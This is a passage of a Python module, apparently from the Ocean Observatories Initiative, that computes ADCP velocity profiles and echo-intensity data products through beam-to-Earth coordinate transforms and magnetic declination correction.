**** For all tRDI ADCP instruments:
adcp_backscatter -- calculates ECHOINT-B1_L1,
calculates ECHOINT-B2_L1,
calculates ECHOINT-B3_L1,
calculates ECHOINT-B4_L1.
**** Base functions used by above functions
adcp_beam2ins -- applies the beam to instrument transform using a 4
beam solution for instruments programmed in beam coordinates
adcp_ins2earth -- applies the instrument to Earth transform for all
instruments originally programmed in beam coordinates.
magnetic_correction -- corrects horizontal velocities for the magnetic
variation (declination) at the measurement location.
**** Supplementary functions to calculate velocity bin depths:
adcp_bin_depths -- calculates bin depths for the pd0 output format
(virtually all tRDI ADCPs deployed by OOI); uses
TEOS-10 functions p_from_z and enthalpy_SSO_0_p.
adcp_bin_depths_pd8 -- calculates bin depths for the pd8 output format,
assuming that (1) the ADCP operator recorded the
necessary input variables and (2) these are somehow
entered into the CI system.
"""
# Wrapper functions to create the VELPROF L1 data products for instruments
# programmed in beam coordinates by RSN (ADCPS-I,K and ADCPT-B,D,E)
def adcp_beam_eastward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt):
"""
Description:
Wrapper function to compute the Eastward Velocity Profile (VELPROF-VLE)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
                    magnetic declination values calculated using the WMM 2010.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: <NAME>. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
(c) removed the depth dependence from the magnetic declination.
Usage:
uu_cor = adcp_beam_eastward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt)
where
        uu_cor = east velocity profiles in Earth coordinates corrected for the
magnetic declination (VELPROF-VLE_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELPROF-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELPROF-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELPROF-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELPROF-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
z = instrument's pressure sensor reading (depth) [daPa]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays of the correct dimensions
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the beam to instrument transform
u, v, w, eee = adcp_beam2ins(b1, b2, b3, b4)
#print eee
# compute the instrument to earth beam transform
uu, vv, _ = adcp_ins2earth(u, v, w, h, p, r, vf)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
uu_cor, _ = magnetic_correction(theta, uu, vv)
# scale velocity to m/s
uu_cor = uu_cor / 1000. # mm/s -> m/s
# return the Eastward Velocity Profile
return uu_cor
def adcp_beam_northward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt):
"""
Description:
Wrapper function to compute the Northward Velocity Profile (VELPROF-VLN)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
                    magnetic declination values calculated using the WMM 2010.
        2014-03-28: <NAME>. Corrected documentation only.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: Christopher Wingard. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
(c) removed the depth dependence from the magnetic declination.
Usage:
vv_cor = adcp_beam_northward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt)
where
        vv_cor = north velocity profiles in Earth coordinates corrected for the
magnetic declination (VELPROF-VLN_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELPROF-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELPROF-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELPROF-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELPROF-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
z = instrument's pressure sensor reading (depth) [daPa]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays of the correct dimensions
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
uu, vv, _ = adcp_ins2earth(u, v, w, h, p, r, vf)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
_, vv_cor = magnetic_correction(theta, uu, vv)
# scale velocity to m/s
vv_cor = vv_cor / 1000. # mm/s -> m/s
# return the Northward Velocity Profile
return vv_cor
def adcp_beam_vertical(b1, b2, b3, b4, h, p, r, vf):
"""
Description:
Wrapper function to compute the Upward Velocity Profile (VELPROF-VLU)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
magnetic declination values calculated using the WMM 2010.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: <NAME>. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
Usage:
ww_cor = adcp_beam_vertical(b1, b2, b3, b4, h, p, r, vf)
where
ww_cor = vertical velocity profiles (VELPROF-VLU_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELPROF-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELPROF-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELPROF-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELPROF-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
"""
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
_, _, ww = adcp_ins2earth(u, v, w, h, p, r, vf)
# scale upward velocity to m/s
ww = ww / 1000. # mm/s -> m/s
# return the Upward Velocity Profile
return ww
def adcp_beam_error(b1, b2, b3, b4):
"""
Description:
Wrapper function to compute the Error Velocity Profile (VELPROF-ERR)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2015-06-10: <NAME>.
Moved the conditioning of input beam velocities to adcp_beam2inst.
Usage:
        e = adcp_beam_error(b1, b2, b3, b4)
where
e = Error velocity profiles (VELPROF-ERR_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELPROF-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELPROF-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELPROF-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELPROF-B4_L0) [mm s-1]
"""
# compute the beam to instrument transform
_, _, _, e = adcp_beam2ins(b1, b2, b3, b4)
# scale error velocity to m/s
    e = e / 1000.  # mm/s -> m/s
# return the Error Velocity Profile
return e
# Wrapper functions to create the VELPROF L1 data products for instruments
# programmed in Earth coordinates by CGSN (Pioneer and Endurance) (ADCPA,
# ADCPS-J,L,N and ADCPT-C,F,G,M)
def adcp_earth_eastward(u, v, z, lat, lon, dt):
"""
Description:
Wrapper function to compute the Eastward Velocity Profile (VELPROF-VLE)
from Earth coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
                    magnetic declination values calculated using the WMM 2010.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: <NAME>. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
Removed the depth dependence from the magnetic declination.
        2015-06-25: <NAME>. Incorporated int fillvalue -> NaN.
Usage:
uu_cor = adcp_earth_eastward(u, v, z, lat, lon, dt)
where
uu_cor = eastward velocity profiles in Earth coordinates corrected for
the magnetic declination (VELPROF-VLE_L1) [m s-1]
u = Eastward velocity profiles (VELPROF-VLE_L0) [mm s-1]
v = Northward velocity profiles (VELPROF-VLN_L0) [mm s-1]
z = instrument's pressure sensor reading (depth) [daPa]
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays
u = np.atleast_2d(u)
v = np.atleast_2d(v)
# on input, the elements of u and v are of type int.
u, v = replace_fill_with_nan(ADCP_FILLVALUE, u, v)
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
uu_cor, _ = magnetic_correction(theta, u, v)
# scale velocity to m/s
uu_cor = uu_cor / 1000. # mm/s -> m/s
# return the Eastward Velocity Profile
return uu_cor
def adcp_earth_northward(u, v, z, lat, lon, dt):
"""
Description:
Wrapper function to compute the Northward Velocity Profile (VELPROF-VLN)
from Earth coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
                    magnetic declination values calculated using the WMM 2010.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: <NAME>. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
Removed the depth dependence from the magnetic declination.
        2015-06-25: <NAME>. Incorporated int fillvalue -> NaN.
Usage:
vv_cor = adcp_earth_northward(u, v, z, lat, lon, dt)
where
vv_cor = northward velocity profiles in Earth coordinates corrected for
the magnetic declination (VELPROF-VLN_L1) [m s-1]
u = Eastward velocity profiles (VELPROF-VLE_L0) [mm s-1]
v = Northward velocity profiles (VELPROF-VLN_L0) [mm s-1]
z = instrument's pressure sensor reading (depth) [daPa]
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays
u = np.atleast_2d(u)
v = np.atleast_2d(v)
# on input, the elements of u and v are of type int.
u, v = replace_fill_with_nan(ADCP_FILLVALUE, u, v)
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
_, vv_cor = magnetic_correction(theta, u, v)
# scale velocity to m/s
vv_cor = vv_cor / 1000. # mm/s -> m/s
# return the Northward Velocity Profile
return vv_cor
def adcp_earth_vertical(w):
"""
Description:
Wrapper function to compute the Upward Velocity Profile (VELPROF-VLU)
from Earth coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2014-06-25: <NAME>. Initial code.
        2015-06-25: <NAME>. Incorporated int fillvalue -> NaN.
Usage:
w_scl = adcp_earth_vertical(w)
where
w_scl = scaled upward velocity profiles in Earth coordinates
(VELPROF-VLU_L1) [m s-1]
w = upward velocity profiles (VELPROF-VLU_L0) [mm s-1]
"""
w = replace_fill_with_nan(ADCP_FILLVALUE, w)
# scale velocity to m/s
w_scl = w / 1000. # mm/s -> m/s
# return the Upward Velocity Profile
return w_scl
def adcp_earth_error(e):
"""
Description:
Wrapper function to compute the Error Velocity Profile (VELPROF-ERR)
from Earth coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2014-06-25: <NAME>. Initial code.
2015-06-25: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
e_scl = adcp_earth_error(e)
where
e_scl = scaled error velocity profiles in Earth coordinates
(VELPROF-ERR_L1) [m s-1]
e = error velocity profiles (VELPROF-ERR_L0) [mm s-1]
"""
e = replace_fill_with_nan(ADCP_FILLVALUE, e)
# scale velocity to m/s
e_scl = e / 1000. # mm/s -> m/s
# return the scaled Error Velocity Profile
return e_scl
# Compute the VELTURB_L1 data products for the VADCP instrument deployed by RSN.
def vadcp_beam_eastward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt):
"""
Description:
Wrapper function to compute the Eastward Velocity Profile (VELTURB-VLE)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Turbulent Velocity Profile and Echo Intensity -
DCN 1341-00760.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
(c) removed the depth dependence from the magnetic declination.
Usage:
uu_cor = vadcp_beam_eastward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt)
where
uu_cor = east velocity profiles in Earth coordinates corrected for the
magnetic declination (VELTURB-VLE_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
z = instrument's pressure sensor reading (depth) [daPa]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays of the correct dimensions
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
uu, vv, _ = adcp_ins2earth(u, v, w, h, p, r, vf)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
uu_cor, _ = magnetic_correction(theta, uu, vv)
# scale velocity to m/s
uu_cor = uu_cor / 1000. # mm/s -> m/s
# return the Eastward Velocity Profile
return uu_cor
def vadcp_beam_northward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt):
"""
Description:
Wrapper function to compute the Northward Velocity Profile
(VELTURB-VLN) from beam coordinate transformed velocity profiles as
defined in the Data Product Specification for Turbulent Velocity
Profile and Echo Intensity - DCN 1341-00760.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
(c) removed the depth dependence from the magnetic declination.
Usage:
vv_cor = vadcp_beam_northward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt)
where
vv_cor = north velocity profiles in Earth coordinates corrected for the
magnetic declination (VELTURB-VLN_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
z = instrument's pressure sensor reading (depth) [daPa]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays of the correct dimensions
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
uu, vv, _ = adcp_ins2earth(u, v, w, h, p, r, vf)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
_, vv_cor = magnetic_correction(theta, uu, vv)
# scale velocity to m/s
vv_cor = vv_cor / 1000. # mm/s -> m/s
# return the Northward Velocity Profile
return vv_cor
def vadcp_beam_vertical_est(b1, b2, b3, b4, h, p, r, vf):
"""
Description:
Wrapper function to compute the "estimated" Upward Velocity Profile
(VELTURB-VLU-4BM) from the beam coordinate transformed velocity profiles as
defined in the Data Product Specification for Turbulent Velocity
Profile and Echo Intensity - DCN 1341-00760. This provides the
traditional estimate of the vertical velocity component from a 4 beam
solution, where each beam is facing outward at an angle (20 degrees)
relative to the vertical.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
2015-06-22: <NAME>. Renamed this data product.
Usage:
ww_est = vadcp_beam_vertical_est(b1, b2, b3, b4, h, p, r, vf)
where
ww_est = estimated vertical velocity profiles in Earth coordinates
(VELTURB-VLU-4BM_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
"""
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
_, _, ww = adcp_ins2earth(u, v, w, h, p, r, vf)
# scale upward velocity to m/s
ww = ww / 1000. # mm/s -> m/s
# return the estimated Upward Velocity Profile
return ww
def vadcp_beam_vertical_true(b1, b2, b3, b4, b5, h, p, r, vf):
"""
Description:
Wrapper function to compute the "true" Upward Velocity Profile
(VELTURB-VLU-5BM) from the beam coordinate transformed velocity profiles as
defined in the Data Product Specification for Turbulent Velocity
Profile and Echo Intensity - DCN 1341-00760. This is assumed to provide
a better estimate of the true vertical velocity component, since beam 5
is pointing directly up.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
2015-06-22: <NAME>. Renamed this data product.
2015-06-25: <NAME>. Incorporated b5 int fillvalue -> Nan.
Usage:
ww_true = vadcp_beam_vertical_true(b1, b2, b3, b4, b5, h, p, r, vf)
where
ww_true = true vertical velocity profiles in Earth coordinates
(VELTURB-VLU-5BM_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
b5 = "beam 5" velocity profiles in beam coordinates (VELTURB-B5_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
"""
# compute the beam to instrument transform
# fill values in the 4 beams are checked for inside adcp_beam2ins
u, v, _, _ = adcp_beam2ins(b1, b2, b3, b4)
# check b5 for the presence of fill values
b5 = replace_fill_with_nan(ADCP_FILLVALUE, b5)
# compute the instrument to earth beam transform
# fill values in the adcp orientation parameters are checked for inside adcp_ins2earth
_, _, ww = adcp_ins2earth(u, v, b5, h, p, r, vf)
# scale upward velocity to m/s
ww = ww / 1000. # mm/s -> m/s
# return the true Upward Velocity Profile
return ww
def vadcp_beam_error(b1, b2, b3, b4):
"""
Description:
Wrapper function to compute the Error Velocity Profile (VELTURB-ERR)
from the beam coordinate transformed velocity profiles as defined in
the Data Product Specification for Turbulent Velocity Profile and Echo
Intensity - DCN 1341-00760.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
Moved the conditioning of input beam velocities to adcp_beam2inst.
Usage:
e = vadcp_beam_error(b1, b2, b3, b4)
where
e = error velocity profiles (VELTURB-ERR_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
"""
# compute the beam to instrument transform
_, _, _, e = adcp_beam2ins(b1, b2, b3, b4)
# scale error velocity to m/s
e = e / 1000.  # mm/s -> m/s
# return the Error Velocity Profile
return e
# Calculates ECHOINT_L1 for all tRDI ADCPs
def adcp_backscatter(raw, sfactor):
"""
Description:
Converts the echo intensity data from counts to dB using a factory
specified scale factor (nominally 0.45 dB/count for the Workhorse
family of ADCPs and 0.61 dB/count for the ExplorerDVL family). As
defined in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2014-04-21: <NAME>. Initial code.
2015-06-25: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
dB = adcp_backscatter(raw, sfactor)
where
dB = Relative Echo Intensity (ECHOINT_L1) [dB]
raw = raw echo intensity (ECHOINT_L0) [count]
sfactor = factory supplied scale factor, instrument and beam specific [dB/count]
Notes:
The ADCP outputs the raw echo intensity as a 1-byte integer, so the ADCP_FILLVALUE
cannot apply (requires 2 bytes).
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00750_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
if np.isscalar(sfactor) is False:
sfactor = sfactor.reshape(sfactor.shape[0], 1)
# check raw for the presence of system fill values
raw = replace_fill_with_nan(None, raw)
dB = raw * sfactor
return dB
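# Editor's sketch (not part of the original module): converting raw counts to
# dB with the nominal Workhorse scale factor quoted in the docstring above.
def _example_adcp_backscatter():
    import numpy as np
    raw = np.array([[50.0, 100.0]])     # raw echo intensity [counts]
    dB = adcp_backscatter(raw, 0.45)  # 0.45 dB/count (Workhorse nominal)
    assert np.allclose(dB, [[22.5, 45.0]])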
##### ADCP Beam to Earth Transforms and Magnetic Variation Corrections
def adcp_beam2ins(b1, b2, b3, b4):
"""
Description:
This function converts the Beam Coordinate transformed velocity
profiles to the instrument coordinate system. The calculations are
defined in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2015-06-24: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
u, v, w, e = adcp_beam2ins(b1, b2, b3, b4)
where
u = "east" velocity profiles in instrument coordinates [mm s-1]
v = "north" velocity profiles in instrument coordinates [mm s-1]
w = "vertical" velocity profiles in instrument coordinates [mm s-1]
e = "error" velocity profiles [mm s-1]
b1 = "beam 1" velocity profiles in beam coordinates [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates [mm s-1]
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00750_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
b1 = np.atleast_2d(b1)
b2 = np.atleast_2d(b2)
b3 = np.atleast_2d(b3)
b4 = np.atleast_2d(b4)
b1, b2, b3, b4 = replace_fill_with_nan(ADCP_FILLVALUE, b1, b2, b3, b4)
theta = 20.0 / 180.0 * np.pi
a = 1.0 / (2.0 * np.sin(theta))
b = 1.0 / (4.0 * np.cos(theta))
c = 1.0 # +1.0 for convex transducer head, -1 for concave
d = a / np.sqrt(2.0)
u = c * a * (b1 - b2)
v = c * a * (b4 - b3)
w = b * (b1 + b2 + b3 + b4)
e = d * (b1 + b2 - b3 - b4)
return (u, v, w, e)
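# Editor's sketch (not part of the original module): a quick sanity check of
# the 20-degree beam geometry above. When all four slant beams report the
# same along-beam velocity, the horizontal and error components vanish and
# only the vertical component survives, scaled by 1/cos(20 deg).
def _example_adcp_beam2ins():
    import numpy as np
    beam = np.array([[100.0, 200.0]])  # one packet, two bins [mm s-1]
    u, v, w, e = adcp_beam2ins(beam, beam, beam, beam)
    assert np.allclose(u, 0.0) and np.allclose(v, 0.0) and np.allclose(e, 0.0)
    assert np.allclose(w, beam / np.cos(np.radians(20.0)))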
def adcp_ins2earth(u, v, w, heading, pitch, roll, vertical):
"""
Description:
This function converts the Instrument Coordinate transformed velocity
profiles to the Earth coordinate system. The calculation is defined in
the Data Product Specification for Velocity Profile and Echo Intensity
- DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-04-04: <NAME>. Optimized code performance by replacing the for
loops previously used to calculate vectorized matrix multiplication
products with calls to np.einsum (numpy Einstein summation function).
2015-06-24: <NAME>. Changed implementation of 'vertical' in the roll
calculation so that if these values are equal to the CI fill value
(-999999999), when these fill values are replaced with nans, the nans
will propagate through to the data product output.
2015-06-24: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
uu, vu, ww = adcp_ins2earth(u, v, w, heading, pitch, roll, vertical)
where
uu = "east" velocity profiles in earth coordinates [mm s-1]
vv = "north" velocity profiles in earth coordinates [mm s-1]
ww = "vertical" velocity profiles in earth coordinates [mm s-1]
u = east velocity profiles in instrument coordinates [mm s-1]
v = north velocity profiles in instrument coordinates [mm s-1]
w = vertical velocity profiles in instrument coordinates [mm s-1]
heading = instrument's uncorrected magnetic heading [centidegrees]
pitch = instrument pitch [centidegrees]
roll = instrument roll [centidegrees]
vertical = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00750_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
### the input beam data for adcp_ins2earth are always called using the output
### of adcp_beam2ins, so the following lines are not needed.
# insure we are dealing with array inputs
#u = np.atleast_2d(u)
#v = np.atleast_2d(v)
#w = np.atleast_2d(w)
# check for CI fill values before changing units.
# this function 'conditions' (np.atleast_1d) its inputs.
# TRDI does not apply its ADCP fill/bad value sentinels to compass data.
heading, pitch, roll, vertical = replace_fill_with_nan(None, heading, pitch, roll, vertical)
# change units from centidegrees to degrees
heading = heading / 100.0
pitch = pitch / 100.0
roll = roll / 100.0
# better way to calculate roll from the vertical orientation toggle;
# this will propagate R as nans if the vertical variable is missing from the data.
R = roll + vertical * 180.0
# roll
Rrad = np.radians(R)
cos_R = np.cos(Rrad)
sin_R = np.sin(Rrad)
# heading
Hrad = np.radians(heading)
cos_H = np.cos(Hrad)
sin_H = np.sin(Hrad)
# pitch
t1rad = np.radians(pitch)
t2rad = np.radians(roll)
Prad = np.arctan(np.tan(t1rad) * np.cos(t2rad))
